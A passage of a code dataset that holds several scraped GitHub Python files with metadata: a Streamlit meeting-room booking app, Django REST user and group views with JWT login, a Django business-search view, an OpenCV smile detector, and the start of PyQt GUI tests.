formの中身にどういう項目を入れるのか→withの中身で指定する\n with st.form(key='room'): # keyはformとの紐付け\n # room_id: int = random.randint(0, 10) # room_idは登録したタイミングで決める\n room_name: str = st.text_input('会議室名', max_chars=12) # , max12文字\n capacity: int = st.number_input('定員', step=1)\n # roomのpostで必要なデータを送ってあげる\n data = {\n # 'room_id': room_id,\n 'room_name': room_name,\n 'capacity': capacity\n }\n submit_button = st.form_submit_button(label='会議室登録') # formに紐づく送信ボタン\n\n # submit_buttonが押されたとき(リクエスト送信されたとき)\n if submit_button:\n url = 'http://127.0.0.1:8000/rooms'\n res = requests.post(\n url,\n data=json.dumps(data)\n )\n if res.status_code == 200:\n st.success('会議室登録完了')\n # st.write(res.status_code)\n st.json(res.json())\n\n\n# 予約画面\nelif page == 'bookings':\n st.title('会議室予約画面')\n\n # ユーザー一覧取得\n url_users = 'http://127.0.0.1:8000/users'\n res = requests.get(url_users)\n users = res.json()\n # st.json(users)\n # ユーザー名をキー、ユーザーIDをバリュー\n users_dict = {}\n for user in users:\n users_dict[user['username']] = user['user_id']\n # st.write(users_dict)\n\n # 会議室一覧取得\n url_rooms = 'http://127.0.0.1:8000/rooms'\n res = requests.get(url_rooms)\n rooms = res.json()\n st.json(rooms)\n # 会議室名をキー、capacity, room_idをvalue\n rooms_dict = {}\n for room in rooms:\n rooms_dict[room['room_name']] = {\n 'room_id': room['room_id'],\n 'capacity': room['capacity']\n }\n st.write(rooms_dict)\n\n # formの中身にどういう項目を入れるのか→withの中身で指定する\n with st.form(key='booking'): # keyはformとの紐付け\n booking_id: int = random.randint(0, 10)\n user_id: int = random.randint(0, 10)\n room_id: int = random.randint(0, 10)\n booked_num: int = st.number_input('予約人数', step=1)\n date = st.date_input('日付: ', min_value=datetime.date.today()) # 今日以降の日付\n start_time = st.time_input('開始時刻: ', value=datetime.time(hour=9, minute=0)) # デフォルト9:00\n end_time = st.time_input('終了時刻: ', value=datetime.time(hour=20, minute=0)) # デフォルト20:00\n\n # formの中意味をそのまま\n data = {\n 'booking_id': booking_id,\n 'user_id': user_id,\n 'room_id': room_id,\n 'booked_num': booked_num,\n 'start_datetime': datetime.datetime(\n year=date.year,\n month=date.month,\n day=date.day,\n hour=start_time.hour,\n minute=start_time.minute\n ).isoformat(), # datetime型をisoformatに変換する\n 'end_datetime': datetime.datetime(\n year=date.year,\n month=date.month,\n day=date.day,\n hour=end_time.hour,\n minute=end_time.minute\n ).isoformat(),\n }\n submit_button = st.form_submit_button(label='リクエスト送信') # formに紐づく送信ボタン\n\n # submit_buttonが押されたとき(リクエスト送信されたとき)\n if submit_button:\n st.write('## 送信データ')\n st.json(data)\n st.write('## レスポンス結果')\n url = 'http://127.0.0.1:8000/bookings'\n res = requests.post(\n url,\n data=json.dumps(data)\n )\n st.write(res.status_code)\n st.json(res.json())\n", "repo_name": "Yuzuki-9/conference-room-reservations", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 5273, "program_lang": "python", "lang": "ja", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "streamlit.sidebar.selectbox", "line_number": 8, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 8, "usage_type": "attribute"}, {"api_name": "streamlit.title", "line_number": 12, "usage_type": "call"}, {"api_name": "streamlit.form", "line_number": 15, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 17, "usage_type": "call"}, {"api_name": "streamlit.form_submit_button", "line_number": 23, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 28, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 30, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 33, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 34, "usage_type": "call"}, {"api_name": "streamlit.json", "line_number": 35, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 40, "usage_type": "call"}, {"api_name": "streamlit.form", "line_number": 43, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 45, "usage_type": "call"}, {"api_name": "streamlit.number_input", "line_number": 46, "usage_type": "call"}, {"api_name": "streamlit.form_submit_button", "line_number": 53, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 58, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 60, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 63, "usage_type": "call"}, {"api_name": "streamlit.json", "line_number": 65, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 70, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 74, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 85, "usage_type": "call"}, {"api_name": "streamlit.json", "line_number": 87, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 95, "usage_type": "call"}, {"api_name": "streamlit.form", "line_number": 98, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 99, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 100, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 101, "usage_type": "call"}, {"api_name": "streamlit.number_input", "line_number": 102, "usage_type": "call"}, {"api_name": "streamlit.date_input", "line_number": 103, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 103, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 103, "usage_type": "attribute"}, {"api_name": "streamlit.time_input", "line_number": 104, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 104, "usage_type": "call"}, {"api_name": "streamlit.time_input", "line_number": 105, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 105, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 113, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 120, "usage_type": "call"}, {"api_name": "streamlit.form_submit_button", "line_number": 128, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 132, "usage_type": "call"}, {"api_name": "streamlit.json", "line_number": 133, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 134, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 136, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 138, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 140, "usage_type": "call"}, {"api_name": "streamlit.json", "line_number": 141, "usage_type": "call"}]} +{"seq_id": "38021877243", "text": "from rest_framework_jwt.settings import api_settings\nfrom rest_framework_jwt.views import ObtainJSONWebToken\nfrom rest_framework.response import Response\nfrom django.http import Http404\nfrom rest_framework import status\n# from rest_framework import filters\nfrom .filters import UsersFilter, tGroupFilter\nfrom rest_framework import viewsets\n# from rest_framework.views import APIView\nfrom rest_framework.decorators import action\nfrom rest_framework.pagination import PageNumberPagination\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom django.contrib.auth import get_user_model\nfrom users.models import tGroup\nfrom users.serializers import UserSerializer, UserCreateSerializer, UserSimpleSerializer, \\\n tGroupListSerializer, tGroupDetailSerializer, tGroupCreateSerializer, tGroupPermAppDetailSerializer, \\\n tGroupUpdateSerializer\n\n\njwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER\njwt_encode_handler = api_settings.JWT_ENCODE_HANDLER\njwt_decode_handler = api_settings.JWT_DECODE_HANDLER\n\n\nUser = get_user_model()\n\n'''\n重写以Token返回自定义响应.\ndef jwt_response_payload_handler(token, user=None, request=None):\n return {\n 'id': UserSerializer(user, context={'request':request}).data['id'],\n 'username': UserSerializer(user, context={'request':request}).data['username'],\n 'token': token\n }\n'''\n\n\n# 重写以Token返回自定义响应.\nclass CustomObtainJSONWebToken(ObtainJSONWebToken):\n def post(self, request, *args, **kwargs):\n response = super(CustomObtainJSONWebToken, self).post(request,\n *args,\n **kwargs\n )\n # get token\n token = response.data.get('token', '')\n\n # custom response\n if token:\n user = jwt_decode_handler(token)\n userobj = User.objects.get(pk=user.get('user_id'))\n else:\n req = request.data\n password = req.get('password', '')\n username = req.get('username', '')\n if not username and not password:\n return Response(\n {\n 'msg': '用户名和密码不能为空',\n },\n status=status.HTTP_400_BAD_REQUEST\n )\n try:\n userobj = User.objects.get(username=username)\n except User.DoesNotExist:\n return Response(\n {\n 'msg': '用户不存在',\n },\n status=status.HTTP_404_NOT_FOUND\n )\n\n if not userobj.check_password(password):\n return Response(\n {\n 'msg': '密码错误'\n },\n status.HTTP_401_UNAUTHORIZED\n )\n\n payload = jwt_payload_handler(userobj)\n token = jwt_encode_handler(payload)\n userser = UserSerializer(userobj).data\n return Response(\n {\n 'id': userser.get('id'),\n 'username': userser.get('username'),\n 'token': token\n }\n )\n\n\n# 用户列表分页\nclass UserPagination(PageNumberPagination):\n page_size = 10\n page_size_query_param = 'page_size'\n page_query_param = 'page'\n max_page_size = 100\n\n\n# 用户组列表分页\nclass tGroupPagination(PageNumberPagination):\n page_size = 10\n page_size_query_param = 'page_size'\n page_query_param = 'page'\n max_page_size = 100\n\n\n# 用户视图\nclass UserViewSet(viewsets.ModelViewSet):\n queryset = User.objects.all()\n serializer_class = UserSerializer\n pagination_class = UserPagination\n filter_backends = (DjangoFilterBackend,)\n filter_class = UsersFilter\n\n def get_serializer_class(self):\n if self.action == 'create':\n return UserCreateSerializer\n return UserSerializer\n\n\n# 用户组视图\nclass tGroupViewSet(viewsets.ModelViewSet):\n queryset = tGroup.objects.all()\n pagination_class = tGroupPagination\n filter_backends = (DjangoFilterBackend,)\n filter_class = tGroupFilter\n serializer_class = tGroupDetailSerializer\n\n def get_serializer_class(self):\n if self.action == 'list':\n return tGroupListSerializer\n if self.action == 'create':\n return tGroupCreateSerializer\n if self.action == 'update':\n return tGroupUpdateSerializer\n return tGroupDetailSerializer\n\n @action(detail=True, methods=['put'], name='delete user from usergroup')\n def delete_user_group(self, request, pk=None):\n try:\n group = tGroup.objects.get(pk=pk)\n except tGroup.DoesNotExist:\n raise Http404\n try:\n user = User.objects.get(pk=request.data.get('id'))\n except User.DoesNotExist:\n raise Http404\n\n group.users.remove(user)\n\n return Response({'msg': 'delete success'}, status=status.HTTP_204_NO_CONTENT)\n\n @action(detail=True, methods=['get'], name='group outside user')\n def group_outside_user(self, request, pk=None):\n users = User.objects.exclude(tgroup__id=pk)\n serializer = UserSimpleSerializer(users, many=True)\n\n return Response(\n serializer.data,\n status=status.HTTP_200_OK\n )\n\n @action(detail=True, methods=['post'], name=\"add user to group\")\n def add_userto_group(self, request, pk=None):\n try:\n group = tGroup.objects.get(pk=pk)\n except tGroup.DoesNotExist:\n raise Http404\n\n if \"users\" not in request.data:\n return Response({\n 'msg': 'params user not define'\n })\n\n users = []\n for userid in request.data.get('users'):\n try:\n user = User.objects.get(pk=userid)\n except User.DoesNotExist:\n raise Http404\n\n if user in group.users.all():\n continue\n\n group.users.add(user)\n users.append(user)\n\n serializer = UserSimpleSerializer(users, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n @action(detail=True, methods=['get'], name=\"get group permisson apps\")\n def get_group_permapp(self, request, pk=None):\n try:\n group = tGroup.objects.get(pk=pk)\n except tGroup.DoesNotExist:\n raise Http404\n\n serializer = tGroupPermAppDetailSerializer(group)\n\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n\n'''\n用户组剔除成员\nclass tGroupDeleteUserApiView(APIView):\n def post(self, request, pk, format=None):\n try:\n user = User.objects.get(pk=pk)\n except User.DoesNotExist:\n raise Http404\n return Response({'msg': '删除成功'}, status=status.HTTP_200_OK)\n\n def get(self, request, pk, format=None):\n return Response({'msg': 'test'}, status=status.HTTP_200_OK)\n'''\n", "repo_name": "playonefor/turiy", "sub_path": "backend/apps/users/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7124, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "rest_framework_jwt.settings.api_settings.JWT_PAYLOAD_HANDLER", "line_number": 20, "usage_type": "attribute"}, {"api_name": "rest_framework_jwt.settings.api_settings", "line_number": 20, "usage_type": "name"}, {"api_name": "rest_framework_jwt.settings.api_settings.JWT_ENCODE_HANDLER", "line_number": 21, "usage_type": "attribute"}, {"api_name": "rest_framework_jwt.settings.api_settings", "line_number": 21, "usage_type": "name"}, {"api_name": "rest_framework_jwt.settings.api_settings.JWT_DECODE_HANDLER", "line_number": 22, "usage_type": "attribute"}, {"api_name": "rest_framework_jwt.settings.api_settings", "line_number": 22, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 25, "usage_type": "call"}, {"api_name": "rest_framework_jwt.views.ObtainJSONWebToken", "line_number": 39, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 57, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 61, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 61, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 66, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_404_NOT_FOUND", "line_number": 70, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 70, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 74, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_401_UNAUTHORIZED", "line_number": 78, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 78, "usage_type": "name"}, {"api_name": "users.serializers.UserSerializer", "line_number": 83, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 84, "usage_type": "call"}, {"api_name": "rest_framework.pagination.PageNumberPagination", "line_number": 94, "usage_type": "name"}, {"api_name": "rest_framework.pagination.PageNumberPagination", "line_number": 102, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 110, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 110, "usage_type": "name"}, {"api_name": "users.serializers.UserSerializer", "line_number": 112, "usage_type": "name"}, {"api_name": "django_filters.rest_framework.DjangoFilterBackend", "line_number": 114, "usage_type": "name"}, {"api_name": "filters.UsersFilter", "line_number": 115, "usage_type": "name"}, {"api_name": "users.serializers.UserCreateSerializer", "line_number": 119, "usage_type": "name"}, {"api_name": "users.serializers.UserSerializer", "line_number": 120, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 124, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 124, "usage_type": "name"}, {"api_name": "users.models.tGroup.objects.all", "line_number": 125, "usage_type": "call"}, {"api_name": "users.models.tGroup.objects", "line_number": 125, "usage_type": "attribute"}, {"api_name": "users.models.tGroup", "line_number": 125, "usage_type": "name"}, {"api_name": "django_filters.rest_framework.DjangoFilterBackend", "line_number": 127, "usage_type": "name"}, {"api_name": "filters.tGroupFilter", "line_number": 128, "usage_type": "name"}, {"api_name": "users.serializers.tGroupDetailSerializer", "line_number": 129, "usage_type": "name"}, {"api_name": "users.serializers.tGroupListSerializer", "line_number": 133, "usage_type": "name"}, {"api_name": "users.serializers.tGroupCreateSerializer", "line_number": 135, "usage_type": "name"}, {"api_name": "users.serializers.tGroupUpdateSerializer", "line_number": 137, "usage_type": "name"}, {"api_name": "users.serializers.tGroupDetailSerializer", "line_number": 138, "usage_type": "name"}, {"api_name": "users.models.tGroup.objects.get", "line_number": 143, "usage_type": "call"}, {"api_name": "users.models.tGroup.objects", "line_number": 143, "usage_type": "attribute"}, {"api_name": "users.models.tGroup", "line_number": 143, "usage_type": "name"}, {"api_name": "users.models.tGroup.DoesNotExist", "line_number": 144, "usage_type": "attribute"}, {"api_name": "users.models.tGroup", "line_number": 144, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 145, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 149, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 153, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_204_NO_CONTENT", "line_number": 153, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 153, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 140, "usage_type": "call"}, {"api_name": "users.models", "line_number": 157, "usage_type": "name"}, {"api_name": "users.serializers.UserSimpleSerializer", "line_number": 158, "usage_type": "call"}, {"api_name": "users.models", "line_number": 158, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 160, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 162, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 162, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 155, "usage_type": "call"}, {"api_name": "users.models.tGroup.objects.get", "line_number": 168, "usage_type": "call"}, {"api_name": "users.models.tGroup.objects", "line_number": 168, "usage_type": "attribute"}, {"api_name": "users.models.tGroup", "line_number": 168, "usage_type": "name"}, {"api_name": "users.models.tGroup.DoesNotExist", "line_number": 169, "usage_type": "attribute"}, {"api_name": "users.models.tGroup", "line_number": 169, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 170, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 173, "usage_type": "call"}, {"api_name": "users.models", "line_number": 177, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 182, "usage_type": "name"}, {"api_name": "users.models.append", "line_number": 188, "usage_type": "call"}, {"api_name": "users.models", "line_number": 188, "usage_type": "name"}, {"api_name": "users.serializers.UserSimpleSerializer", "line_number": 190, "usage_type": "call"}, {"api_name": "users.models", "line_number": 190, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 191, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 191, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 191, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 165, "usage_type": "call"}, {"api_name": "users.models.tGroup.objects.get", "line_number": 196, "usage_type": "call"}, {"api_name": "users.models.tGroup.objects", "line_number": 196, "usage_type": "attribute"}, {"api_name": "users.models.tGroup", "line_number": 196, "usage_type": "name"}, {"api_name": "users.models.tGroup.DoesNotExist", "line_number": 197, "usage_type": "attribute"}, {"api_name": "users.models.tGroup", "line_number": 197, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 198, "usage_type": "name"}, {"api_name": "users.serializers.tGroupPermAppDetailSerializer", "line_number": 200, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 202, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 202, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 202, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 193, "usage_type": "call"}]} +{"seq_id": "32270127339", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse, Http404\nfrom django.template import loader\n\nfrom django.db.models import Q\n\nfrom .models import CompanyTypes, Company\n\n#Constants that help with determining a default location\n#and doing a very rough calculation from Latitude and\n#longiture degrees to miles\nCOORDINATE_TO_MILES = 75.0\nPORTLAND_LAT = 45.5732\nPORTLAND_LON = -122.7276\n\n# Send the default home page,\n# before any location or search parameters\n# are given\ndef index(request):\n companies = Company.objects.all()\n companies_dict = {\n 'companies': companies,\n 'lat': PORTLAND_LAT,\n 'lon': PORTLAND_LON\n }\n return render(request, 'find_business/index.html', companies_dict)\n\n# Queries for a list of businesses based on certain\n# search parameters, these parameters include the\n# company type, a search string and a within distance (mi)\n# as well as the users current location\ndef business_query(request):\n '''\n returns result from client side query\n '''\n print(request)\n if request.method == 'POST':\n print(request.POST)\n query_dict = {}\n valid_dict = {}\n for company_attr in ('type','search','lat','lon','within'):\n val = request.POST.get(company_attr)\n if val:\n valid_dict[company_attr] = True\n query_dict[company_attr] = val\n else:\n valid_dict[company_attr] = False\n companies = Company.objects.all()\n\n if (valid_dict['search']):\n search = query_dict['search']\n companies = Company.objects.filter(\n Q(name__icontains=search) |\n Q(description__icontains=search) |\n Q(activities__icontains=search)\n )\n\n if (valid_dict['type']):\n mytype = CompanyTypes[query_dict['type']]\n companies = companies.filter(type=mytype)\n\n if (valid_dict['within'] & (query_dict['within'] != '0')):\n dist = float(query_dict['within'])/COORDINATE_TO_MILES\n print(dist)\n lat = float(query_dict['lat'])\n lon = float(query_dict['lon'])\n lat_max = lat + dist\n lat_min = lat - dist\n lon_max = lon + dist\n lon_min = lon - dist\n print(str(lat) + ' ' + str(lon))\n print(str(lat_max) + ' ' + str(lat_min) + ' ' + str(lon_max) + ' ' + str(lon_min))\n companies = companies.filter(\n (Q(coordinatesLat__lte=lat_max) &\n Q(coordinatesLat__gte=lat_min)) &\n (Q(coordinatesLon__lte=lon_max) &\n Q(coordinatesLon__gte=lon_min)))\n\n print(companies.all())\n\n companies_dict = {\n 'companies': companies.all(),\n 'lat': query_dict['lat'],\n 'lon': query_dict['lon']\n }\n\n return render(request, 'find_business/businesses_list.html', companies_dict)\n\n else:\n raise Http404()\n\n# Queries the database for all company names that are listed\n# and returns a list of tuples decribing the location of each company\n# that was requested\ndef locations_query(request):\n locations = []\n if request.method == 'POST':\n print(request.POST)\n names = request.POST.get('names').split(\",\")\n for companyName in names:\n company = Company.objects.get(name=companyName)\n if company:\n locations.append((\n company.coordinatesLat, \n company.coordinatesLon)\n )\n else:\n locations.append((45.0, -122.0))\n print(locations)\n return JsonResponse(locations, safe=False)\n", "repo_name": "SteliosPapoutsakis/BusinessFinder", "sub_path": "BusinessFinder/find_business/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3714, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "models.Company.objects.all", "line_number": 20, "usage_type": "call"}, {"api_name": "models.Company.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.Company", "line_number": 20, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 26, "usage_type": "call"}, {"api_name": "models.Company.objects.all", "line_number": 48, "usage_type": "call"}, {"api_name": "models.Company.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "models.Company", "line_number": 48, "usage_type": "name"}, {"api_name": "models.Company.objects.filter", "line_number": 52, "usage_type": "call"}, {"api_name": "models.Company.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "models.Company", "line_number": 52, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 53, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 54, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 55, "usage_type": "call"}, {"api_name": "models.CompanyTypes", "line_number": 59, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 74, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 75, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 76, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 77, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 87, "usage_type": "call"}, {"api_name": "django.http.Http404", "line_number": 90, "usage_type": "call"}, {"api_name": "models.Company.objects.get", "line_number": 101, "usage_type": "call"}, {"api_name": "models.Company.objects", "line_number": 101, "usage_type": "attribute"}, {"api_name": "models.Company", "line_number": 101, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 110, "usage_type": "call"}]} +{"seq_id": "73709425245", "text": "# -*- coding=utf-8 -*-\r\nimport cv2\r\n\r\n\r\nfacePath = \"src/lbpcascade_frontalface.xml\"\r\nfaceCascade = cv2.CascadeClassifier(facePath)\r\n\r\nsmilePath = \"src/haarcascade_smile.xml\"\r\nsmileCascade = cv2.CascadeClassifier(smilePath)\r\n\r\n\r\ndef main():\r\n video_capture = cv2.VideoCapture(0)\r\n\r\n\r\n while True:\r\n # Capture frame-by-frame\r\n ret, frame = video_capture.read()\r\n\r\n\r\n\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n\r\n\r\n faces = faceCascade.detectMultiScale(\r\n gray,\r\n scaleFactor= 1.1,\r\n minNeighbors=8,\r\n minSize=(55, 55),\r\n flags=cv2.CASCADE_SCALE_IMAGE\r\n )\r\n\r\n\r\n for (x, y, w, h) in faces:\r\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 0, 255), 2)\r\n roi_gray = gray[y:y+h, x:x+w]\r\n roi_color = frame[y:y+h, x:x+w]\r\n\r\n\r\n smile = smileCascade.detectMultiScale(\r\n roi_gray,\r\n scaleFactor= 1.16,\r\n minNeighbors=35,\r\n minSize=(25, 25),\r\n flags=cv2.CASCADE_SCALE_IMAGE\r\n )\r\n\r\n\r\n for (x2, y2, w2, h2) in smile:\r\n cv2.rectangle(roi_color, (x2, y2), (x2+w2, y2+h2), (255, 0, 0), 2)\r\n cv2.putText(frame,'Smile',(x,y-7), 3, 1.2, (0, 255, 0), 2, cv2.LINE_AA)\r\n\r\n k = cv2.waitKey(1)\r\n if k%256 == 27:\r\n # ESC pressed\r\n print(\"Escape hit, closing...\")\r\n break\r\n\r\n cv2.namedWindow(\"Video\", cv2.WND_PROP_FULLSCREEN)\r\n cv2.setWindowProperty(\"Video\",cv2.WND_PROP_FULLSCREEN,cv2.WINDOW_FULLSCREEN)\r\n cv2.imshow('Video', frame)\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n # When everything is done, release the capture\r\n video_capture.release()\r\n cv2.destroyAllWindows()\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n", "repo_name": "laurentmnr/face_reco_app", "sub_path": "src/smile.py", "file_name": "smile.py", "file_ext": "py", "file_size_in_byte": 1885, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "cv2.CascadeClassifier", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.CascadeClassifier", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 22, "usage_type": "attribute"}, {"api_name": "cv2.CASCADE_SCALE_IMAGE", "line_number": 30, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.CASCADE_SCALE_IMAGE", "line_number": 45, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 51, "usage_type": "attribute"}, {"api_name": "cv2.waitKey", "line_number": 53, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.WND_PROP_FULLSCREEN", "line_number": 59, "usage_type": "attribute"}, {"api_name": "cv2.setWindowProperty", "line_number": 60, "usage_type": "call"}, {"api_name": "cv2.WND_PROP_FULLSCREEN", "line_number": 60, "usage_type": "attribute"}, {"api_name": "cv2.WINDOW_FULLSCREEN", "line_number": 60, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 61, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 63, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 68, "usage_type": "call"}]} +{"seq_id": "27596316867", "text": "\"\"\"These tests are used to check functionality. They were written for KDE4 and\na window size of 900x600 and might not work on other configurations\"\"\"\n\n\n\nfrom PyQt4.QtTest import QTest\nfrom PyQt4.QtCore import Qt\n\nfrom gui import win\nfrom lib.action import Action\nfrom lib import qtest\n\n# initialize the qtest module\nqtest.init(win)\n\n\ndef cube_diagonal_():\n QTest.keyPress(win.viewer_3d, Qt.Key_P, Qt.AltModifier)\n qtest.click_at([250, 180])\n qtest.click_at([210, 440])\n qtest.click_at([650, 400])\n QTest.keyPress(win, Qt.Key_X, Qt.AltModifier)\n qtest.click_at([400, 50])\n qtest.click_at([400, 400])\n QTest.keyPress(win, Qt.Key_Space, Qt.NoModifier)\n qtest.click_at([700, 100])\n QTest.keyPress(win, Qt.Key_G, Qt.ControlModifier)\n qtest.click_at([215, 440])\n QTest.keyPress(win, Qt.Key_Space)\n QTest.keyPress(win, Qt.Key_Space)\n qtest.click_at([660, 90])\ncube_diagonal = Action(cube_diagonal_, ('&Unit Tests', 'Cube &Diagonal'))\n\n\ndef u_bahn_():\n # cube\n QTest.keyPress(win.viewer_3d, Qt.Key_B, Qt.ControlModifier)\n qtest.mouse_move([350, 320])\n QTest.keyPress(win.viewer_3d, Qt.Key_C, Qt.NoModifier, 100)\n QTest.keyPress(win.command_dock_widget.line_edit, Qt.Key_Z, Qt.NoModifier)\n QTest.keyPress(win.command_dock_widget.line_edit, Qt.Key_Minus,\n Qt.NoModifier)\n QTest.keyPress(win.command_dock_widget.line_edit, Qt.Key_1, Qt.NoModifier)\n QTest.keyPress(win.command_dock_widget.line_edit, Qt.Key_Return,\n Qt.NoModifier)\n qtest.mouse_move([430, 320])\n QTest.keyPress(win.command_dock_widget.line_edit, Qt.Key_Return,\n Qt.NoModifier)\n qtest.click_at([430, 330])\n # sphere\n qtest.click_at([120, 10])\n qtest.click_at([120, 130])\n qtest.click_at([390, 320])\n qtest.click_at([430, 320])\n # intersection\n qtest.click_at([200, 10])\n qtest.click_at([200, 55])\n qtest.click_at([390, 320])\n qtest.click_at([370, 330])\n # delete\n qtest.click_at([200, 10])\n qtest.click_at([200, 30])\n qtest.click_at([390, 320])\n qtest.click_at([360, 320])\n QTest.keyPress(win.viewer_3d, Qt.Key_Escape, Qt.NoModifier)\nu_bahn = Action(u_bahn_, ('&Unit Tests', '&U-Bahn'))\n\n\ndef view_control_():\n qtest.click_at([250, 15])\n qtest.click_at([250, 30])\nview_control = Action(view_control_, ('&Unit Tests', '&View control'))\n\ntoolbar_visible = 